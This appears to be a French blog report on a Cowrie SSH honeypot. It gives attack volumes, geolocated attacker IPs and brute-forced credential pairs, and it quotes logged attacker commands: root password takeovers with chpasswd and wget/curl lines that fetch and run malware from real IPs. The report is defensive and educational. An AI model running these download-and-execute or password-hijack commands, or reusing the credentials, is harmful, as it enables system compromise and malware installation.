Honeypot – exploration des cybermenaces

Dans le jargon de la sécurité informatique, un honeypot (en français, au sens propre pot de miel) est une méthode de défense qui consiste à attirer sur des ressources du réseau, des adversaires déclarés ou potentiels afin de les identifier, observer et éventuellement de les neutraliser.

  • Petite présentation de notre honeypot

C’est un honeypot ssh basé sur cowrie. Il a été mise en service le 01 avril 2020 car nous avons pensé que c’est une des meilleures plaisanteries à faire dans cette période de confinement – la preuve, il est toujours fonctionnel et grâce à lui, nous pouvons apprendre d’avantage au sujet des cybermenaces.

Cette présentation a été créée dans le but purement éducatif. Il s’agit de montrer l’importance du volume des cyberattaques et de réveiller la conscience des utilisateurs face aux risques cyber. Nous espérons que cette présentation vous apportera  une meilleure vision de l’importance de la cybersécurité. 


  • Activité générale

Ce tableau représente l'activité globale de notre honeypot, ce qui correspond à son activité générale depuis sa mise en ligne.

Informations générales
Nombre total des cyberattaques2569478
Nombre total des attaquants (IP unique)44723
La premère cyberattaque a débutéeWednesday, 01-Apr-2020, 15:29 (GTM +1)
La dernière cyberattaque a débutéeThursday, 15-Apr-2021, 03:52 (GTM +1)

Le tableau ci-dessous, représente une activité journalière de notre honeypot.

Informations journalières
Heure locale du honeypotThursday, 15-04-21, 03:52 (GTM +1)
Nombre des cyberattaques d'aujourd'hui9769
Attaquant récent212.102.35.145
Provenance géographique du dernier attaquantNetherlands (NL)

Voici la représentation graphique de l'activité quotidienne de notre honeypot. Les points indiquent le nombre des cyberattaques reçues par jour.


Le graphique ci-dessous représente les vingt jours de plus grand nombre des cyberattaques reçues, qui ont été enregistrées par notre honeypot.


Nous pouvons visualiser aussi la représentation graphique des dix combinaisons des noms d'utilisateurs et des mots de passe, le plus souvent utilisées par les attaquants. C'est le graphique ci-dessous.


  • Géolocalisation des attaquants

Nous allons choisir les dix plus grands attaquants dans la base des données de notre honeypot et procéder à leurs géolocalisation. Nous allons entrer ces données dans le tableau ci-dessous:

Informations au sujet de la géolocalisation et classement des dix attaquats le plus actifs
Adresse IPAttaquesVilleRégionPaysCodeLatitudeLongitudenom d'hôte
1
112.85.42.23244496XinpuJiangsuChinaCN34.5997119.1594112.85.42.232
2
112.85.42.23834909XinpuJiangsuChinaCN34.5997119.1594112.85.42.238
3
49.88.112.11033769ShanghaiShanghaiChinaCN31.0449121.401249.88.112.110
4
112.85.42.22927705XinpuJiangsuChinaCN34.5997119.1594112.85.42.229
5
183.230.135.23726987ChongqingChongqingChinaCN29.5569106.5531183.230.135.237
6
134.228.170.17413134SylvaniaOhioUnited StatesUS41.7061-83.7044cm-134-228-170-174.buckeyecom.net
7
218.76.215.412627YongzhouHunanChinaCN26.4239111.6131218.76.215.4
8
45.227.255.20412232PanamaPA9-80hosting-by.web4net.org
9
142.93.8.14711136North BergenNew JerseyUnited StatesUS40.793-74.0247142.93.8.147
10
88.137.55.6510730RantzwillerHaut-RhinFranceFR47.65247.375165.55.137.88.rev.sfr.net

Afin de visualiser le volume des cyberattaques de chaqun d'entre eux, nous allons ajouter les codes des pays (à deux lettres) après leurs adresses IP. Nous obtiendrons ainsi leurs provenance géographique.
Sur le graphique ci-dessous, nous pouvons voir le volume des cyberattaques ainsi que les données de la géolocalisation des attaquant les plus actifs.


Ceci nous premet d'afficher les données du volume des cyberattaques en fonction des pays de leurs origines. Ci-dessous nous avons la représentation graphique du volume global des cyberattaques reçues en fonction la géolocalisation des attaquants les plus actifs.


  • Les intrusions

Certains attaquants ont réussi à trouver les bonnes combinaisons login/mot de passe, ce qui nous a permis à observer leurs attaques. Voici la présentation des certaines données recueillies:

Voici la représentation graphique du ratio des cyberattaques "réussies". Pour cela, regardons le graphique présent ci-dessous. La raison du ratio des réussites si faible c'est utilisation des mots de passe assez forts et robustes. Nous savons qu'ils sont présents dans les wordlists des attaquants et la réussite ce n'est qu'une question de temps. La raison de cette politique était de ne pas avoir d'attaques réussies depuis les réseaux de botnets, qui ciblent la majorité des péripheriques IoT. C'est pour mieux simmuler les condition d'une petite entreprise beneficiant des services proposés par une petite sociéte de l'infogérance dans ce temps d'une pandemie du COVID-19.

Ci-dessous, nous trouvons le graphique affichant les intrusions hébdomadaires enregistrées par notre honeypot. Les points de la courbe indiquent le nombre total d'intrusions dans la même jornée.


Le graphique ci-dessous affiche les vingt jours ayant le plus grand nombres d'intrusions. Les chiffres indiquent combien de fois des informations d'identification correctes (login et mot de passe) ont été saisies par les attaquants.


Le graphe ci-dessous affiche le nombre d'intrusions réussies à partir de la même adresse IP. Les nombres indiquent combien de fois le même attaquant avait réussi d'ouvrir la session en saisissant le login et mot de passe correctement.


Nous allons procéder à la géolocalisation des adresses IP des dix attaquants, qui ont le taux de réussite le plus important.

Informations au sujet des ressources et de la géolocalisation des dix attaquants ayant le plus grand nombe d'intrusions
Vu pour la dernière foisAdresse IPPaysTotal IntrusionsDernier Login utiliséDernier Mot de passe utilisé
1
Thursday, 15-Apr-2021, 00:29 (GTM +1)193.105.134.45Sweden
450
admin1qaz2wsx
2
Thursday, 15-Apr-2021, 02:44 (GTM +1)195.3.147.47Latvia
434
admin1qaz2wsx
3
Thursday, 08-Oct-2020, 19:04 (GTM +1)112.85.42.232China
242
root1qaz@WSX3edc$RFV
4
Monday, 25-Jan-2021, 20:52 (GTM +1)49.88.112.110China
112
root1qaz2wsx123
5
Monday, 25-Jan-2021, 20:55 (GTM +1)154.223.167.54Hong Kong
63
root1qaz2wsx123
6
Sunday, 20-Sep-2020, 06:47 (GTM +1)112.85.42.229China
51
root1qaz2wsx123
7
Wednesday, 14-Apr-2021, 04:04 (GTM +1)109.236.91.85Netherlands
50
admin1qaz2wsx
8
Thursday, 24-Sep-2020, 07:57 (GTM +1)112.85.42.238China
20
root1qaz2wsx123
9
Monday, 10-Aug-2020, 14:46 (GTM +1)98.159.99.227United States
18
root1qaz@WSX3edc$RFV
10
Tuesday, 01-Sep-2020, 14:20 (GTM +1)98.159.99.25United States
17
root1qaz2wsx123

Dans ce tableau, nous pouvons voir aussi les derniers mots de passe utilisés par les attaquants qui leur ont permis d'accéder au système. Remarquez que ce sont les mots de passe "standard" utilisés par beaucoup de professionels de l'infogérance (je ne vais pas citer les noms ici...).

Pour contempler les dix "combinaisons gagnantes", regardons le graphique ci-dessous.


Par cette petite experience, nous avons démontré que l'authentification par login et mot de passe n'est pas une méthode de protection suffisante. Afin de mieux protéger notre serveur ssh contre ces cyberattaques, la méthode des clefs et/ou deuxième facteur d'authentification sera le meilleur choix. Il est également dangereux d'autoriser le login "root" dans la configuration du serveur..

  • Activité post-compromise

Certains attaquants vont essayer de détourner "notre serveur" afin de s’en servir de relais pour mener des actions cybercriminelles et malveillantes, voler nos données, ou tout simplement, utiliser nos ressources pour miner la crypto-monnaie. Ces attaques sont de plus en plus fréquentes et ça arrive plus souvent qu'on y croit. Ce ne sont pas que de grandes entreprises qui sont visées. Nous allons voir ce que les attaquants espèrent d'obtenir en s'attaquant à notre "serveur". La plupart d'attaques provient des divers réseaux botnets. Le problème de ces attaques est la saturation de la bande passante du serveur, parce que nous utilisons les mots de passe assez forts. Nous allons voir ici, les autres types des intrusions et tentatives de détournement du système. Penser que "lorsqu'on a rien à cacher, on ne sera pas ciblé " - est une fausse idée reçue. Tout le monde est concerné et non seulement des grands entreprises. La seule difference est que dans le cas d'une grande entreprise, les problèmes des cyberattaques qui les ont touchées, étaient immédiatement médiatisé...
Nous devons être conscients que le serveur ssh sert à administrer notre machine. C'est une raison suffisante pour qu'il soit particulièrement bien sécurisé.

Le graphique du dessous montre une activité post-compromise journalière. Il prends en compte le nombre d'intrusions pour chaque jour de fonctionnement du honeypot. Ici il s'agit des véritables tentatives de prise de contrôle de notre "serveur".


Le tableau ci-dessous montre les dix commandes "passwd et chpasswd" utilisées par les attaquants affin de modifier le mot de passe et prendre le contrôle totale de notre serveur et par la même occasion, nous empêcher d'y accèder.

IDDateLes dix dernières commandes "passwd & chpasswd"
1
Wednesday, 14-Apr-2021, 21:25echo "root:6Xx23QaOjKvA"|chpasswd|bash
2
Wednesday, 14-Apr-2021, 20:10echo "root:LaYVazKIW3Br"|chpasswd|bash
3
Tuesday, 13-Apr-2021, 21:00echo "1qaz2wsx\nV0gsdHloqZ7q\nV0gsdHloqZ7q\n"|passwd
4
Tuesday, 13-Apr-2021, 21:00echo -e "1qaz2wsx\nV0gsdHloqZ7q\nV0gsdHloqZ7q"|passwd|bash
5
Monday, 12-Apr-2021, 23:41echo "root:hzXjMXYC6niX"|chpasswd|bash
6
Monday, 12-Apr-2021, 15:35echo "1qaz2wsx\nYKNcCOePNTaX\nYKNcCOePNTaX\n"|passwd
7
Monday, 12-Apr-2021, 15:35echo -e "1qaz2wsx\nYKNcCOePNTaX\nYKNcCOePNTaX"|passwd|bash
8
Monday, 12-Apr-2021, 13:57echo "root:oDuxPfFtq1tV"|chpasswd|bash
9
Monday, 12-Apr-2021, 13:13echo "root:HPXni4pKwmE5"|chpasswd|bash
10
Saturday, 10-Apr-2021, 13:27echo "root:fFG8Q1GL6sME"|chpasswd|bash

Le tableau suivant affiche les dix commandes le plus fréquemment utilisées par les attaquants. Cela sert à effectuer un repèrage simplifié. Remarquez que beaucoup de commandes, ce sont celles qui indiquent le type du processeur utilisé et la quantité de la mémoire installée, ce qui est très utile pour installer un crypto-miner (monnaie viruelle). En installant un crypto-miner, le cybercriminel utilisera les ressources de la machine cible pour miner de l'argent virtuel pour sa part à l'insu de son propriétaire legitime. Cela se traduira par la surcharge du processeur (donc une surconsommation électrique), la surchauffe et le rallentissement considérable de la machine infectée. Dans le cas d'installation d'un autre malware, comme par exeple un backdoor, il pourra alors contrôler la machine infectée en la transformant en relais pour relayer les cyberattaques ou mener d'autres activités cybercriminelles.

Les dix commandes fréquemment utilisées (général)Nombre d'entrées
1
cat /proc/cpuinfo | grep name | wc -l
182
2
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
182
3
cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}
182
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
182
5
free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}
182
6
ls -lh $(which ls)
182
7
which ls
182
8
crontab -l
182
9
w
182
10
uname -m
182

Le tableau du dessous affiche dix dernières commandes wget et execution des scripts. Il s'agit bien des malwares que les attaquants tentent de nous faire télécharger afin de les installer dans notre système. Ces malwares pouraient être des backdoors, comme aussi des crypto-miners. Puisqu'avant d'executer un script sur notre système, l'attaquant doit procéder à son télechargement et comme il arrive assez souvent que c'est la même ligne de commande dans un terminal, nous les avons mis dans le même tableau.

DateLes dix dernières commandes "wget" et execution des scripts
1
25-Jan-2021#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/53; curl -O http://98.159.105.55/53; chmod +x 53; ./53;
2
25-Jan-2021#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/21; curl -O http://98.159.105.55/21; chmod +x 21; ./21;
3
22-Jan-2021#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/23; curl -O http://98.159.105.55/23; chmod +x 23; ./23;
4
11-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/8000; curl -O http://98.159.99.47/8000; chmod +x 8000; ./8000;
5
11-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/53; curl -O http://98.159.99.39/53; chmod +x 53; ./53;
6
10-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/53; curl -O http://98.159.99.47/53; chmod +x 53; ./53;
7
10-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306;
8
10-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306;
9
09-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3309; curl -O http://98.159.99.39/3309; chmod +x 3309; ./3309;
10
08-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.12/3309; curl -O http://98.159.99.12/3309; chmod +x 3309; ./3309;

Voilà, notre petite "visite guidée" touche à sa fin. Soyez prudents et ne négligez pas les risques cyber. La cybermenace est bien réelle et les attaquants ne seront jamais gentils avec vous.



Géolocalisation: www.maxmind.com

2 thoughts on “Honeypot – exploration des cybermenaces

Laisser un commentaire